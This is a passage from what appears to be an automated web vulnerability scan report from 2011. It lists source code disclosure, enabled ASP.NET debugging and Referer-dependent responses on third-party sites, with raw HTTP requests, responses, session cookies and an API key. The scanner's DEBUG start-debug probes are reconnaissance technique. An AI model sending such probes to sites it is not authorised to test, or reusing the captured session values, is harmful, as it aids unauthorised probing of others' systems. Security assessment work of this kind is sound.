X-Rack-Cache: fresh
X-Content-Digest: 3f0391ebb89e0d08d8add07de6cf12a5cb1d4dee
X-Runtime: 1746
Cache-Control: public, max-age=300
Server: nginx/0.7.64 + Phusion Passenger 2.2.11 (mod_rails/mod_rack)
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 15228
Date: Tue, 06 Sep 2011 15:40:58 GMT
X-Varnish: 1482397443 1482397441
Age: 108
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<div class="col-5" style="padding-top:25px;">
           <form method="post">
               <label for="subdomain">
...[SNIP]...
</label><input class="formnote" id="password" type="password" name="password" value="" /><!-- <span class="formnote">
...[SNIP]...

15. Source code disclosure
There are 10 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


15.1. http://blogs.oracle.com/otn/resource/1OTN-2col/OTNHead-Short.png

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://blogs.oracle.com
Path:   /otn/resource/1OTN-2col/OTNHead-Short.png

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /otn/resource/1OTN-2col/OTNHead-Short.png HTTP/1.1
Host: blogs.oracle.com
Proxy-Connection: keep-alive
Referer: http://blogs.oracle.com/otn/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343571486; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 21:01:53 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=3600+360;age=372;ecid=47465485677722335,0:1)
Vary: Accept-Encoding
Content-Length: 38457
Expires: Tue, 06 Sep 2011 16:12:52 GMT
Date: Tue, 06 Sep 2011 16:12:52 GMT
Connection: close

.PNG
.
...IHDR.......n.......J.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>_/V.....IDATx...i....-x...Sf..4"..... a..e4x.c.V..
...[SNIP]...

15.2. http://platform.linkedin.com/js/nonSecureAnonymousFramework

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://platform.linkedin.com
Path:   /js/nonSecureAnonymousFramework

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /js/nonSecureAnonymousFramework?v=0.0.1132-RC3.9082-1337 HTTP/1.1
Host: platform.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=1&e6907e29-3b50-4659-95ed-c5124b8e731f"

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=604800
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:33:08 GMT
Expires: Tue, 13 Sep 2011 15:33:08 GMT
Last-Modified: Thu, 01 Sep 2011 02:17:52 GMT
Server: ECS (sjo/5235)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 144326

(function(){
var l,
doAuth,
h = [],
valid = false,
a = "",
fwk = "http://platform.linkedin.com/js/framework?v=0.0.1132-RC3.9082-1337",
xtnreg = /extensions=([^&]*)&?/,
xtn
...[SNIP]...
<?js ?>";
l=l.split(" ");
var p=l[0]||"<?js",o=l[1]||"?>";
if(!p||!o){throw new Error("Template markers must be set.")
}if(p==o){throw new Error("Start and end markers cannot be identical.")
}p=new RegExp(b(p),"g");
o=new RegExp(b(o),"g");
var n=["","var p=
...[SNIP]...

15.3. http://reviews.fekkai.com/module/5113/cmn/5113redes/display.pkg.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://reviews.fekkai.com
Path:   /module/5113/cmn/5113redes/display.pkg.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /module/5113/cmn/5113redes/display.pkg.js HTTP/1.1
Host: reviews.fekkai.com
Proxy-Connection: keep-alive
Referer: http://www.fekkai.com/?gclid=COTMo_SIiasCFQ6AgwodqEol4A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=243632410.732372977.1315345538.1315345538.1315345538.1; __utmb=243632410.1.10.1315345538; __utmc=243632410; __utmz=243632410.1315345538.1.1.utmgclid=COTMo_SIiasCFQ6AgwodqEol4A|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=Direct%20Beauty%20Product

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 06 Sep 2011 11:58:57 GMT
Content-Type: text/javascript;charset=utf-8
Vary: Accept-Encoding
Content-Length: 112212
Cache-Control: max-age=890
Expires: Tue, 06 Sep 2011 17:00:28 GMT
Date: Tue, 06 Sep 2011 16:45:38 GMT
Connection: close

$BV.Internal.define("jquery.effects.core",[document],["jquery.core"],function(a,b){
/*
* jQuery UI Effects 1.8.6
*
* Copyright 2010, AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under t
...[SNIP]...
<H;E++){G.call(F,E)}};C.mixin=function(E){d(C.functions(E),function(F){q(F,C[F]=E[F])})};var k=0;C.uniqueId=function(E){var F=k++;return E?E+F:F};C.templateSettings={evaluate:/<%([\s\S]+?)%>/g,interpolate:/<%=([\s\S]+?)%>/g};C.template=function(H,G){var I=C.templateSettings;var E="var __p=[],print=function(){__p.push.apply(__p,arguments);};with(obj||{}){__p.push('"+H.replace(/\\/g,"\\\\").replace(/'/g,"\\'").replace(I.
...[SNIP]...

15.4. http://reviews.gillettevenus.com/module/4746/cmn/4746/display.pkg.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://reviews.gillettevenus.com
Path:   /module/4746/cmn/4746/display.pkg.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /module/4746/cmn/4746/display.pkg.js HTTP/1.1
Host: reviews.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=193945275.; __utmxx=193945275.; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.1.10.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 06 Sep 2011 12:07:07 GMT
Content-Type: text/javascript;charset=utf-8
Vary: Accept-Encoding
Content-Length: 109248
Cache-Control: max-age=528
Expires: Tue, 06 Sep 2011 16:54:22 GMT
Date: Tue, 06 Sep 2011 16:45:34 GMT
Connection: close

$BV.Internal.define("jquery.effects.core",[document],["jquery.core"],function(a,b){
/*
* jQuery UI Effects 1.8.6
*
* Copyright 2010, AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under t
...[SNIP]...
<H;E++){G.call(F,E)}};C.mixin=function(E){d(C.functions(E),function(F){q(F,C[F]=E[F])})};var k=0;C.uniqueId=function(E){var F=k++;return E?E+F:F};C.templateSettings={evaluate:/<%([\s\S]+?)%>/g,interpolate:/<%=([\s\S]+?)%>/g};C.template=function(H,G){var I=C.templateSettings;var E="var __p=[],print=function(){__p.push.apply(__p,arguments);};with(obj||{}){__p.push('"+H.replace(/\\/g,"\\\\").replace(/'/g,"\\'").replace(I.
...[SNIP]...

15.5. http://search.oracle.com/search/search

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://search.oracle.com
Path:   /search/search

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /search/search?start=1&search_p_main_operator=all&group=Oracle+OpenWorld&q=xss+faq+help+contact+phone HTTP/1.1
Host: search.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/register/packages/index.html?src=7013425&Act=226
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1315342463159; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Fregister%2Fpackages%2Findex.html%3Fsrc%3D7013425%26Act%3D226; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=0
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.2 (TN;ecid=118531604039,0)
Content-Length: 38704
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:54:24 GMT
Connection: close
Set-Cookie: JSESSIONID=8d920c7f1e6c29f780b369434c7e86c0802cf02ce47e; path=/search
Set-Cookie: ses.qapp.sg_tab_name=Oracle+OpenWorld; HttpOnly
Set-Cookie: BIGipServerses_ext_prod_pool=2131530381.30494.0000; expires=Wed, 07-Sep-2011 03:54:24 GMT; path=/



...[SNIP]...
<div id="desktop" class="pagevariable"><%-- For GDfE results --%><!--tro2-->
...[SNIP]...

15.6. http://www.cvs.com/CVSApp/js/functions.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.cvs.com
Path:   /CVSApp/js/functions.js

Issue detail

The application appears to disclose some server-side source code written in JSP.

Request

GET /CVSApp/js/functions.js HTTP/1.1
Host: www.cvs.com
Proxy-Connection: keep-alive
Referer: http://www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp?promoLandingId=1350&WT.mc_id=PS_ECBC_Google
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6A0441D1E876CF59B214E21046F87449.commerce_311

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:42 GMT
Server: Apache
Last-Modified: Thu, 21 Jul 2011 09:53:16 GMT
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 16:45:42 GMT
Vary: Accept-Encoding
Content-Length: 88173
Content-Type: application/javascript

/* ---------------------------------------------------
Global variables:

Values set to variables used by other functions
afterwards.
---------------------------------------------
...[SNIP]...
<!-- INCLUDE BEGINS --><%@include file="../path/to/include.jsp"%><!-- INCLUDE ENDS -->
...[SNIP]...

15.7. https://www.cvs.com/CVSApp/js/functions.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.cvs.com
Path:   /CVSApp/js/functions.js

Issue detail

The application appears to disclose some server-side source code written in JSP.

Request

GET /CVSApp/js/functions.js HTTP/1.1
Host: www.cvs.com
Connection: keep-alive
Referer: https://www.cvs.com/CVSApp/user/login.jsp?pagevalue=newrx&screenname=newrx&_requestid=362832
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6A0441D1E876CF59B214E21046F87449.commerce_311; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315345643244:ss=1315345545800

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:47:30 GMT
Server: Apache
Last-Modified: Thu, 21 Jul 2011 09:53:16 GMT
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 16:47:30 GMT
Vary: Accept-Encoding
Content-Length: 88173
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/* ---------------------------------------------------
Global variables:

Values set to variables used by other functions
afterwards.
---------------------------------------------
...[SNIP]...
<!-- INCLUDE BEGINS --><%@include file="../path/to/include.jsp"%><!-- INCLUDE ENDS -->
...[SNIP]...

15.8. https://www.cvs.com/CVSApp/js/userprofile.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.cvs.com
Path:   /CVSApp/js/userprofile.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /CVSApp/js/userprofile.js HTTP/1.1
Host: www.cvs.com
Connection: keep-alive
Referer: https://www.cvs.com/CVSApp/user/forgot_password.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6A0441D1E876CF59B214E21046F87449.commerce_311; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315345673339:ss=1315345545800

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:48:00 GMT
Server: Apache
Last-Modified: Tue, 30 Jun 2009 05:01:50 GMT
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 16:48:00 GMT
Vary: Accept-Encoding
Content-Length: 6957
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: application/javascript

function openRemoveCardPopup(cardKey) {
window.name="BillingInfo";
var dialogUrl = "myacc_dialog_confirm_creditcard_removal.jsp?cardKey="+cardKey;
if (window.showModalDi
...[SNIP]...
ocument.add.newNickname.value == "e.g., Work, Home")
document.add.newNickname.value = "";
}
document.add.submit();
}


function openMilitaryLink(){
window.open("<%=request.getContextPath()%>/user/military_address_window.jsp");
}

function formSubmit() {
document.getElementById("hidsubmit").focus=false;
document.getElementById("hidsubmit").click();
if (window.showModalD
...[SNIP]...

15.9. http://www.dove.us/Resources/JS/dove.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.dove.us
Path:   /Resources/JS/dove.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Resources/JS/dove.js HTTP/1.1
Host: www.dove.us
Proxy-Connection: keep-alive
Referer: http://www.dove.us/Products/Hair/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=5jfk3byymtjxyinfzvf23uyi

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 27 Jul 2011 03:53:46 GMT
Accept-Ranges: bytes
ETag: "0c1dcc8104ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 21499
Date: Tue, 06 Sep 2011 16:45:43 GMT
Connection: close

var dove, mightLikeCarouselwrapCounter = 0;
if (!dove) {
   dove = {};
}
dove.log = function (message, type) {
   type = type || "info";
   if (typeof console !== "undefined" && dove.global.debug) {

...[SNIP]...

$(".instantWinError").html('You forgot to fill in the field(s) denoted in red.').show();
$(".instantWinChkError").html("").hide();
// $('#<%=txtInstantWinEmail.ClientID %>').addClass("test");
$('.inst-winFields').addClass('inst-winInvalid');

}
else if (value.match(pattern) == null) {
               
$(".instantWinChkError").html("").hide();
$(".instantWinError").html('Please enter valid e-mail address.').show();
//$('#<%=txtInstantWinEmail.ClientID %>').addClass("test");
$('.inst-winFields').addClass('inst-winInvalid');
}
else {
$(".instantWinError").html("").hide()

...[SNIP]...

15.10. http://www.netsuite.com/portal/javascript/NLPortal.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.netsuite.com
Path:   /portal/javascript/NLPortal.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /portal/javascript/NLPortal.js HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html?gclid=CMyov8D4iKsCFSBCgwodRnXLzA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=QT3hTm8p7D1Q2hhMSM3rQLFQvcw2J3TQShKJRpn1Yhv9FTy2DQVng1H0TCB1KJGCkCkpDxH4DCFJNC0Nj2667xXJTjLwhfB8YwwBpTkcx5GNPSrJxnLxrTJMV2nLTVxD!-982923961; NLShopperId=Mhd7aqh5AbdCXidV; NLVisitorId=Mhd7aqh5AbpCXgSl; NS_VER=2011.2.0

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 51165
Content-Disposition: inline;filename*=utf-8''NLPortal.js
NS_RTIMER_COMPOSITE: -2134941949:73686F702D6A6176613030332E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: max-age=1523
Date: Tue, 06 Sep 2011 15:32:14 GMT
Connection: close
Vary: Accept-Encoding

function getBaseDomain()
{
var domain = document.domain;
var ifirst= domain.indexOf(".");
domain=domain.substring(ifirst+1);        
return domain;
}

// for netcrm the appdomain is netsuite
...[SNIP]...
&& partner.length > -1)
{
var vCookieVals = partner.split(",");
partner = vCookieVals[1];
//document.cookie = "visitorCookie; path=/portal/; domain="www.<%=NLConfig.getSystemDomain()%>"; expires=Fri, 02-Jan-1970 00:00:00";
// setCookie("visitorCookie", null, null, , "www.<%=NLConfig.getSystemDomain()%>", secure)
if(partner != null && partner != "")
setCookie("partner", partner, "/", null, getBaseDomain(), null)
}
}

//return null if no partner code exi
...[SNIP]...

16. ASP.NET debugging enabled
There are 3 instances of this issue:

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targeted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file, so you should also confirm that the debug attribute of the <compilation> element has not been set to "true" there.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.



16.1. http://services.plymedia.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://services.plymedia.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: services.plymedia.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 06 Sep 2011 16:13:00 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.2. http://www.oraclecfo.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.oraclecfo.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.oraclecfo.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 06 Sep 2011 16:10:51 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.3. http://www.znode.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.znode.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.znode.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 06 Sep 2011 15:32:06 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

17. Referer-dependent response
There are 10 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the content of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kind of user-supplied data.



17.1. http://a.tribalfusion.com/j.ad

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.tribalfusion.com
Path:   /j.ad

Request 1

GET /j.ad?site=targus&adSpace=ros&tagKey=117090495&th=37103964303&tKey=undefined&size=0x0&flashVer=10&ver=1.21&center=1&z=&url=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2Fcnbc%2F300x250%2Fatf%3Ft%3D1315339138505%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3DUniversalAudiencePlatform23.com%26refer%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F15838394&f=2&p=19083180&a=1&c9_tg=&c9_ty=&c9_s=000&rnd=19088543 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://cdn5.tribalfusion.com/media/1956006/frame.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response 1

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 303
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:12 GMT;
Content-Type: application/x-javascript
Content-Encoding:
Content-Length: 0
Expires: 0
Connection: keep-alive

Request 2

GET /j.ad?site=targus&adSpace=ros&tagKey=117090495&th=37103964303&tKey=undefined&size=0x0&flashVer=10&ver=1.21&center=1&z=&url=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2Fcnbc%2F300x250%2Fatf%3Ft%3D1315339138505%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3DUniversalAudiencePlatform23.com%26refer%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F15838394&f=2&p=19083180&a=1&c9_tg=&c9_ty=&c9_s=000&rnd=19088543 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response 2

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 303
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: application/x-javascript
Content-Encoding:
Content-Length: 0
Expires: 0
Connection: keep-alive


17.2. http://api.bizographics.com/v1/profile.json

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Request 1

GET /v1/profile.json?api_key=7a1b8d0563d44781afdd2ab0834934ff&callback=_bizo_callback HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Tue, 06 Sep 2011 15:32:50 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 163
Connection: keep-alive

_bizo_callback({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

Request 2

GET /v1/profile.json?api_key=7a1b8d0563d44781afdd2ab0834934ff&callback=_bizo_callback HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response 2

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:33:05 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 21
Connection: keep-alive

Unknown Referer: null

17.3. http://c.brightcove.com/services/viewer/federated_f9

Summary

Severity:   Information
Confidence:   Firm
Host:   http://c.brightcove.com
Path:   /services/viewer/federated_f9

Request 1

GET /services/viewer/federated_f9?isVid=1 HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://blogs.oracle.com/otn/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
